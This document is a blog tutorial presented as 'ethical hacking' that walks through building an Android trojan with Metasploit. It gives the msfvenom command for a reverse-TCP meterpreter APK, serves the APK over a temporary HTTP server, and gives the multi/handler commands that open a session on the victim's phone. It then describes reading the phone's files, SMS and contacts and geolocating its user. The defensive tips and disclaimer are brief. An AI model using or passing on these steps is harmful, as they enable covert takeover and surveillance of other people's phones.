Ethical Hacking 101 - How Can You Hack Into An Android Device 📱 In 2022?

We will be seeing how can you hack onto your phone in 2022 using the Metasploit Framework. This attack will be done using a Trojan created using Metasploit

Disclaimer:-  This post is only meant to illustrate these attacks and is purely for educational purposes only

What is Metasploit 🤔 ?

Metasploit is an open-source computer security project maintained and developed by Rapid7. It includes a set of tools that can help a cyber security analyst of an organization to find some bugs in their system and recommend some potential ways to solve them. It usually comes pre-installed in Kali Linux. It contains over 590 sets of modules that are essentially useful. Some of the Important ones are mentioned below

• Command shell enables users to run collection scripts or run arbitrary commands against the host.
• Meterpreter (the Metasploit Interpreter) enables users to control the screen of a device using VNC and to browse, upload and download files.
• Dynamic payloads enable users to evade anti-virus defence by generating unique payloads.
• Static payloads enable static IP address/port forwarding for communication between the host and the client system

Installing Metasploit

• You can run the following commands to install Metasploit onto your Linux server

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall

• Metasploit is also available for other OS. You can learn about it by clicking on this here
• If you are looking for a cloud server to test out Metasploit then, do consider Vultr

Playing with Metasploit 😉

• For figuring out the public IP of our instance(VM in Cloud) We run wget -qO - ipinfo.io which would fetch you similar output to this  👇

{
  "ip": "11.22.33.444",
  "hostname": "8.9.8.1.bc.googleusercontent.com",
  "city": "Singapore",
  "region": "Singapore",
  "country": "SG",
  "loc": "1.2897,103.8501",
  "org": "AS396982 Google LLC",
  "postal": "018989",
  "timezone": "Asia/Singapore",
  "readme": "https://ipinfo.io/missingauth"
}

• The IP field in the JSON should be the public IP of your instance
• If you're running on your local network then you have to figure out the internal IP of your instance by running ifconfig

• Before we further process we have to create a Trojan which we can easily create by running the command mentioned below

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.106.0.2 LPORT=4444 R> /var/www/html/payload.apk

• -p argument indicates the payload that we are going to use. In this case, it will be android/meterpreter/reverse_tcp
• LHOST will be the host to which you would like to receive the data from the victim. You should change this value to either the public or internal IP of your instance
• LPORT will be the port to which you want to receive the data from the victim. You could either change this value or use the default which is 4444
• R> will save the created payload in the specified directory with the specified extension

• Now go to the directory where the payload has been generated, In my case,  it will be cd /var/www/html & run python -m SimpleHTTPServer 1234 to spin up a temporary server on port 1234
• Now you can easily download the APK file onto your phone just by visiting http://private_or_public_ip:1234/filename.apk
• Once you download the APK and file and try to install the application you might get a similar window popping up where you have to choose the Install anyway option

• Now head over to the instance's terminal and open Metasploit by running msfconsole & run the following commands

use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit

• Please change the value of LHOST & LPORT to the one you configured earlier.

• Now open the application that you have installed. Ideally, the name should be Main Activity
• After you open the app, head over to the terminal, and now a new session must be opened wherein you can take full control of the device

• It also includes some functions that we can use to interact with the Filesystem of the device

• You may also find some functions to get/send SMS or even get all the contacts

• To find the list of all the possible commands just run ? or help  
• Let's see how we can locate the current position of the user but just running one command that is geolocate

Tips to stay away from a Trojan Attack ⚔

• You should not download APKs from untrusted sources
• In this post, I've just shown to create a Trojan APK but real hackers might merge the trojans with legit Apps and ask us to download the APKs. If you would like to know how can we merge Trojan to another APK file do let me know in the comment section below
• You should examine the code before you install any opensource applications

P.S:- Vultr(Get a $100 credit by registering using this link) is a good hosting choice if you're looking for one

Thanks for reading till the end. Do let me know if you have any queries in the comment section below 😀